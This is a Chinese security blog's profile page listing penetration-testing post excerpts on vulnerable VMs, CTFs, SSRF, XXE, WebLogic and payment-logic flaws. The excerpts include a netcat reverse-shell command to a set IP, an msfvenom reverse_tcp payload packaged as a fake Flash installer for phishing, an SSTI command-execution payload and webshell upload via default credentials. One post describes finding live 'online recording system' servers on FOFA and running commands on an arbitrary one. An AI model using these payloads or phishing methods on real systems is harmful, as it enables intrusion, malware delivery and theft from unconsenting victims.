- 博客(13)
- 收藏
- 关注
原创 ➢ Web到Linux-内核溢出Dcow
复现环境:https://www.vulnhub.com/entry/lampiao-1,249/解压Lampiao.zip导⼊虚拟机。
2024-08-29 17:10:49
478
原创 常见的框架漏洞 全网最最最详细漏洞复现教程
Web框架(Web framework)或者叫做Web应⽤框架(Web application framework),是⽤于 进⾏Web开发的⼀套软件架构。⼤多数的Web框架提供了⼀套开发和部署⽹站的⽅式。为Web的 ⾏为提供了⼀套⽀持⽀持的⽅法。使⽤Web框架,很多的业务逻辑外的功能不需要⾃⼰再去完 善,⽽是使⽤框架已有的功能就可以。
2024-08-07 21:30:58
628
原创 常见的中间件漏洞复现--WebLogic
2.用哥斯拉生成一个名问123.jsp的木马,然后压缩为zip文件,将zip后缀改为war。4.因为用哥斯拉生成的木马只能用哥斯拉链接,点击测试链接显示已经链接到。1.登录后台后,点击部署,点击安装,点击上传⽂件。3.这里已经可以看到刚刚上传的war文件了。默认账号密码:weblogic /后台弱⼝令GetShell。
2024-08-06 22:01:28
464
原创 DAMI-支付逻辑漏洞
放行之后可以看见账户余额变成了支付金额,这就是一个典型的支付逻辑漏洞。首先在自己的www下创建一个网站,在浏览器里打开。点击购买开启抓包,将数量改为-1。
2024-08-02 22:00:53
155
原创 反程序化靶机 最详细保姆级教程!!
反弹shell命令:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.81.129+8888+>/tmp/f。然后进行端口扫描,可以看到最有可能的就是131,然后我们把这个地址用kali自带的nmap进行存活主机探测以及开放端口。将这串编码后的payload复制到user=的后面,可以查看到etc/passwd下的内容。将之前咱们新建在自己www下的php文件里面的ip改为自己的本机地址。在新建一个1.txt的文件。
2024-08-01 21:47:00
211
原创 在线录音管理系统漏洞复现
未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁1.fofa网络搜索引擎上输入title="在线录音管理系统",随便找一个打开2.进行抓包发送到重放器3.对上面抓包进行修改然后点击发送,发现id位置有回显,这个时候已经发现有漏洞了4. 然后把id改为ls查看文件命令点击发送,发现这个目录下的文件都显示出来了
2024-07-31 20:13:56
425
原创 CTF BugKu 全网最详解(每日更)
构造语句进行注入 flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}, 发现目录:app。因为规定只能上传jpg\png格式,所以我们将后缀改为jpg进行上传,上传之后发现了flag文件。然后用刚才的账号密码登录就会看到flag弹窗,将flag解码就会得到最后的flag了。然后我们先传入一个flag参数试试,发现页面可以显示被传入flag参数的值。查看flag文件,我们得到flag。
2024-07-30 21:03:31
1034
原创 Hackme靶机 保姆级最详细教程!!!
最后直接dump,把内容下载下来,我们看到了superadmin超级管理员,他的密码是加密状态,进行解密。2.用御剑扫描一下1-255的端口,发现59和60之间出现了一个奇怪的131,我们可以尝试访问一下,发现登录成功说明131就是靶机的地址.4.输入刚才注册的用户名和密码,可以看到登录进来了,我们输入sql注入语句 ' or 1=1 #9.这个时候我们在访问之前的一个上传目录uploads,可以看到我们上传的6.php。8.我们去直接登录,可以看到上传按钮,这个时候上传一个一句话木马。
2024-07-29 21:48:34
660
原创 Apache2---XXE 靶机漏洞实战保姆级教程
思路:1.nmap,dirb扫描,进行一个信息收集。3.利用已知漏洞,注入xxe语句,查看关键文件信息。以下就是对Apache2靶机的一个xxe渗透过程。2.用burp工具抓包,查询可利用漏洞。4.简单的代码审计,最后获取flag。希望可以对大家有帮助。
2024-07-25 21:09:34
464
原创 CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
2024-07-24 22:18:51
1251
原创 XSS-Flash攻击钓⻥
进⼀步对提供下载的Flash⽂件进⾏伪装,在真的Flash官⽹下载安装程序并在kali使⽤msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe。点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏",配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。
2024-07-23 22:58:33
430
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人